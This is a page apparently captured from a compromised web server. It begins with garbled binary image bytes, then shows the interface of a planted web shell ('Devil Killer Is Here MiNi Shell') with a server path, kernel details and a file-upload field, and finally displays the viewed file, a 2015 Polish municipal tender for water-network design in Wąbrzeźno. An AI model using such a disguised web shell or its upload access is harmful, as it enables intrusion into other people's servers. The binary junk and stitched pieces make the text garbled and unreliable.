JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150904/229560-N-2015.html

<p class="kh_header"><b>Wąbrzeźno: Opracowanie dokumentacji projektowej sieci wodociągowej i przyłączy wodociągowych</b><br>
<b>Numer ogłoszenia: 229560 - 2015; data zamieszczenia: 04.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wąbrzeźno , ul. Mickiewicza 21, 87-200 Wąbrzeźno, woj. kujawsko-pomorskie, tel. 056 6871800, faks 056 6881704.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wabrzezno.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej sieci wodociągowej i przyłączy wodociągowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na opracowaniu kompletnej dokumentacji projektowej sieci wodociągowej i dokumentacji projektowej przyłączy wodociągowych - z włączeniem do istniejących sieci wodociągowych oraz uzyskanie niezbędnych opinii, uzgodnień, decyzji oraz zatwierdzeń umożliwiających kompleksową realizację inwestycji wraz ze zgłoszeniem robót budowlanych właściwemu organowi. 
Sieć wodociągowa i przyłącza wodociągowe zlokalizowane są we wsiach Ludowice, Małe Radowiska, Węgorzyn, Orzechowo, Pływaczewo, Sitno, Myśliwiec, Jarantowice i Zieleń na terenie gminy Wąbrzeźno. 
Wykonawca sporządzi odrębne opracowania dla sieci wodociągowej i przyłączy wodociągowych.  
2.  Przewidywana łączna długość sieci wodociągowej 17,0 km, przewidywana łączna długość przyłączy wodociągowych 1,0 km (48 sztuk).
3. Dokumentacje    projektowe    spełniać    muszą     wymogi   wynikające   z   przepisów   ustawy   Prawo  budowlane  i rozporządzenia  Ministra Infrastruktury z dnia 02.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót  budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 poz. 1129). 
4.  Po zawarciu umowy w sprawie zamówienia publicznego zamawiający przekaże wykonawcy wykaz właścicieli do nieruchomości których zaprojektować należy przyłącza wodociągowe. 
5.  Usługa obejmuje w szczególności:

- w zakresie sieci wodociągowej:

1)  sporządzenie map sytuacyjno-wysokościowych w skali 1:1000 do celów projektowych w zakresie niezbędnym do  opracowania przedmiotowej dokumentacji;
2)  sporządzenie aktualnego wykazu właścicieli nieruchomości, przez grunty których przebiegała będzie projektowana trasa wodociągu; 
3)  opracowanie dokumentacji geotechnicznej;   
4) uzyskanie decyzji o środowiskowych uwarunkowaniach i zgody na realizację przedsięwzięcia wraz z przygotowaniem materiałów niezbędnych do jej uzyskania;
5) uzyskanie dla zamawiającego na podstawie udzielonego pełnomocnictwa decyzji o lokalizacji inwestycji celu publicznego  wraz z przygotowaniem materiałów niezbędnych do jej uzyskania;
6)  opracowanie operatów wodnoprawnych na przekroczenie wodociągiem cieków wodnych;
7) uzyskanie zgód właścicieli nieruchomości, przez  grunty których przebiegały będzie projektowana trasa sieci wodociągowej na zajęcie gruntu i budowę sieci wodociągowej; 
8) opracowanie projektu budowlanego  i projektu wykonawczego sieci wodociągowej wraz z opisami, uzgodnieniami, i innymi dokumentami wymaganymi przepisami szczególnymi w tym zakresie;
9) opracowanie szczegółowej specyfikacji technicznej wykonania i odbioru robót budowlanych w zakresie sieci wodociągowej;
10) sporządzenie kosztorysu inwestorskiego w zakresie sieci wodociągowej;  
11) sporządzenie przedmiaru robót w zakresie sieci wodociągowej;
12) przygotowanie kompletu dokumentów niezbędnych do zgłoszenia robót budowlanych w Starostwie Powiatowym i zgłoszenie robót;
13) uzupełnienie dokumentów załączonych do zgłoszenia robót budowlanych jeżeli właściwy organ nałoży na zgłaszającego taki obowiązek.

Dokumentacja projektowa w zakresie sieci wodociągowej obejmuje:

 - kompletny projekt budowlany i wykonawczy opracowany zgodnie z obowiązującymi przepisami prawa 
umożliwiający kompleksową realizację inwestycji z niezbędnymi opiniami, uzgodnieniami, opracowaniami i  
zatwierdzeniami wraz ze zgłoszeniem robót budowlanych i uzupełnieniem dokumentów jeżeli zajdzie taka potrzeba
obejmujący wszystkie lokalizacje sieci wodociągowej - w ilości 5 egzemplarzy w wersji papierowej i 1 egzemplarz w  
wersji elektronicznej w formacie PDF;
- przedmiar robót i kosztorys inwestorski - w ilości 2 egzemplarzy w wersji papierowej i 1 egzemplarz w formie elektronicznej PDF;
- specyfikacje techniczne wykonania i odbioru robót budowlanych - w ilości 2 egzemplarzy w wersji papierowej i 1 egzemplarz w formie elektronicznej PDF;
- informację dotyczącą bezpieczeństwa i ochrony zdrowia;
a ponadto:
-  zgody właścicieli nieruchomości, na zajęcie nieruchomości przez które przebiegała będzie sieć wodociągowa; 
- aktualny wykaz właścicieli nieruchomości, przez które przebiegała będzie sieć wodociągowa;
- dokumentacja geotechniczna - w ilości 1 egzemplarza w wersji papierowej i 1 egzemplarz w formie elektronicznej PDF;
- operaty wodnoprawne dla poszczególnych przejść pod ciekami wodnymi -  w ilości 5 egzemplarzy w wersji papierowej i 1 egzemplarz w formie elektronicznej PDF;

Wykonawca przekaże zamawiającemu oryginały wszystkich wymaganych przepisami prawa dokumentów związanych ze zgłoszeniem robót w Starostwie Powiatowym.
Wykonawca przekaże zamawiającemu oryginały dokumentów załączonych do zgłoszenia robót budowlanych w celu ich uzupełnienia jeżeli właściwy organ nałoży na zgłaszającego taki obowiązek.

- w zakresie przyłączy wodociągowych:

1)  sporządzenie map sytuacyjno-wysokościowych w skali 1:1000 do celów projektowych w zakresie niezbędnym do  opracowania przedmiotowej dokumentacji;
2)  sporządzenie aktualnego wykazu właścicieli nieruchomości, przez grunty których przebiegały będą projektowane
przyłącza wodociągowe; 
3) uzyskanie zgód właścicieli nieruchomości, przez  grunty których przebiegały będą projektowane trasy  przyłączy wodociągowych na  zajęcie gruntu i budowę przyłączy wodociągowych; 
4) opracowanie planów, rysunków określających jednoznacznie rodzaj i zakres robót budowlanych oraz uwarunkowań i dokładnej lokalizacji przyłączy wodociągowych wraz z opisami i uzgodnieniami w tym zakresie;
5) opracowanie szczegółowej specyfikacji technicznej wykonania i odbioru robót budowlanych w zakresie przyłączy wodociągowych;
6) sporządzenie kosztorysu inwestorskiego w zakresie przyłączy wodociągowych;  
7) sporządzenie przedmiaru robót w zakresie przyłączy wodociągowych;
Dokumentacja projektowa w zakresie przyłączy wodociągowych obejmuje:
 - projekt budowlany opracowany zgodnie z obowiązującymi przepisami prawa umożliwiający kompleksową realizację inwestycji z niezbędnymi opiniami, uzgodnieniami, opracowaniami i zatwierdzeniami  obejmujący wszystkie lokalizacje przyłączy wodociągowych - w ilości 2 egzemplarzy w wersji papierowej i 1 egzemplarz w wersji elektronicznej w formacie PDF;
- przedmiar robót i kosztorys inwestorski - w ilości 2 egzemplarzy w wersji papierowej i 1 egzemplarz w formie elektronicznej PDF;
- specyfikacje techniczne wykonania i odbioru robót budowlanych - w ilości 2 egzemplarzy w wersji papierowej i 1 egzemplarz w formie elektronicznej PDF;
a ponadto:
-  zgody właścicieli nieruchomości, na zajecie nieruchomości przez które przebiegały będą przyłącza wodociągowe; 
- aktualny wykaz właścicieli nieruchomości, przez które przebiegały będą przyłącza wodociągowe;

6. Wykonawca przekaże zamawiającemu komplet dokumentów.
7. Dokumentacje projektowe muszą umożliwiać przeprowadzenie postępowania o udzielenie zamówienia publicznego na roboty budowlane zgodnie z ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
8. Dokumenty przedłożone w wersji elektronicznej wykorzystywane będą w materiałach przetargowych i publikowane na stronie internetowej zamawiającego.

9. Wymagania zamawiającego co do projektowania 

1) Zamawiający nie dopuszcza projektowania sieci i urządzeń infrastruktury w pasach drogowych dróg powiatowych i gminnych równolegle w stosunku do ich długości (wzdłuż przebiegu trasy dróg);
2) Jeżeli zaistnieje uzasadniona okoliczność że zaprojektowanie sieci wodociągowej poza pasem drogowym dróg gminnych jest niemożliwe dopuszcza się zaprojektowanie sieci wodociągowych w pasie dróg gminnych;
3) Zamawiający wymaga zaprojektowania przyłączy wodociągowych zakończonych zestawem wodomierzowy wraz z zaworem antyskażeniowym;
4) Wykonawca zobowiązany jest do uzgadniania  z zamawiającym na bieżąco lokalizacji projektowanej sieci wodociągowej i przyłączy oraz warunków projektowania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie: 2.580,00 PLN (słownie:  dwa tysiące pięćset osiemdziesiąt złotych).
2. Wadium musi obejmować okres związania ofertą tj. 30 dni od daty ostatecznego terminu składania ofert.
3. Wadium wnosi się przed upływem terminu składania ofert.
4. Wadium może być wniesione w:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r., Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
5.Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto: Bank Spółdzielczy w Chełmnie O/Wąbrzeźno Nr 04 9486 0005 0030 0908 2006 0004 z  dopiskiem:Wadium w przetargu nieograniczonym na opracowanie dokumentacji projektowej sieci wodociągowej i przyłączy wodociągowych.
W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. 
6.W przypadku wniesienia wadium w formie  innej niż w pieniądzu, Zamawiający wymaga złożenia oryginału dokumentu potwierdzającego wniesienie wadium. Zamawiający zaleca aby oryginał dokumentu wadium umieścić w kopercie w której znajduje się oferta w dodatkowej kopercie oznaczonej napisem WADIUM.
7.Nie wniesienie wadium w terminie spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt. 2 Pzp.
8.Zamawiający niezwłocznie zwróci wadium:
a) po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
b) po zawarciu umowy w sprawie zamówienia publicznego - Wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
c) na wniosek Wykonawcy który wycofał ofertę przed upływem terminu składania ofert.
9.Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
10.Zamawiający zatrzymuje  wadium wraz  z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1, pełnomocnictw,  listy podmiotów należących do tej samej grupy kapitałowej , o której mowa w art. 24 ust. 2 pkt. 5, lub  informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki o której mowa w art. 87 ust. 2 pkt. 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie konkretyzuje tego warunku.
Potwierdzeniem spełniania warunku będzie oświadczenie z art. 22 ust. 1 Pzp. Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie uznany za spełniony jeżeli wykonawca wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  minimum jedna usługę  polegającą na opracowaniu dokumentacji projektowej  w zakresie odpowiadającym przedmiotowi zamówienia (sieci wodociągowe z przyłączami i kanalizacyjne) o długości minimum 10 km. 
Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie konkretyzuje tego warunku.
Potwierdzeniem spełniania warunku będzie oświadczenie z art. 22 ust. 1 Pzp. Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie konkretyzuje tego warunku.
Potwierdzeniem spełniania warunku będzie oświadczenie z art. 22 ust. 1 Pzp. Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie konkretyzuje tego warunku.
Potwierdzeniem spełniania warunku będzie oświadczenie z art. 22 ust. 1 Pzp. Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na  potrzeby wykonania zamówienia - jeżeli dotyczy;   
stosowne pełnomocnictwo - jeżeli dotyczy;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje wprowadzenie zmian istotnych postanowień zawartej umowy w stosunku do treści oferty złożonej przez wykonawcę, którego oferta została wybrana jako najkorzystniejsza w następujących okolicznościach:
1. jeżeli zaistnieje konieczność wydłużenie terminu realizacji zamówienia, w przypadku:
a) ponadprzeciętnego czasu trwania procedur administracyjnych, mającego wpływ (obiektywny, niewynikający z opieszałości Wykonawcy) na termin wykonania zamówienia,
b) konieczności uzyskania dodatkowych niezbędnych do projektowania materiałów,
warunków technicznych, uzgodnień, itp.,
2. w zakresie lokalizacji sieci i przyłączy, długości sieci i przyłączy wodociągowych w stosunku do ilości przewidzianej, w tym:
a) zmiany lokalizacji projektowanej sieci i przyłączy wodociągowych (lokalizacja w dodatkowych miejscowościach) oraz zmiany lokalizacji sieci i przyłączy wodociągowych w stosunku do wskazanej w siwz; 
a) zmniejszenia długości sieci wodociągowej i przyłączy wodociągowych oraz ilości przyłączy - zmiana będzie miała wpływ na wynagrodzenie wykonawcy;
b) zwiększenie długości sieci wodociągowej i przyłączy wodociągowych oraz ilości przyłączy - zmiana będzie miała wpływ na wynagrodzenie wykonawcy; 
3.jeżeli zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna za którą żadna ze stron nie ponosi odpowiedzialności skutkująca brakiem możliwości należytego i terminowego wykonania umowy zmianie ulegnie sposób i termin realizacji zamówienia;
4.na skutek działania siły wyższej rozumianej jako zjawisko zewnętrzne, gwałtowne i nieoczekiwane, któremu nie można zapobiec przy dołożeniu nawet nadzwyczajnej staranności zaistnieje konieczność zmiany terminu wykonania zamówienia;
5.jeżeli zaistnieją okoliczności leżące po stronie zamawiającego w szczególności spowodowane sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy zmianie może ulec sposób i terminy realizacji robót oraz wynagrodzenie wykonawcy;
6.jeżeli zaistnieje konieczność wykonania zamówienia dodatkowego w rozumieniu art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.), którego realizacja będzie miała wpływ na realizację wykonania przedmiotu zamówienia zmianie może ulec sposób, termin wykonania robót i wynagrodzenie wykonawcy; 7.jeżeli niezrealizowany zostanie kompletny przedmiot umowy określony w dokumentacji projektowej z powodu okoliczności które nie były możliwe do przewidzenia w chwili zawarcia umowy zmniejszeniu ulegnie wysokość wynagrodzenia wykonawcy;
8.jeżeli w okresie obowiązywania umowy zmianie ulegnie stawka podatku VAT, zmianie ulegnie wysokość wynagrodzenia wykonawcy brutto (wartość netto pozostaje bez zmian);
9. na wniosek Wykonawcy, za zgodą Zamawiającego, Wykonawca może:
1)dokonać zmiany podwykonawcy,
2)zrezygnować z udziału podwykonawcy w realizacji zamówienia,
3)wskazać inny zakres podwykonawstwa niż przedstawiony w ofercie,
4)powierzyć wykonanie części zamówienia podwykonawcom pomimo niewskazania w ofercie części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wabrzezno.bip.net.pl<br>
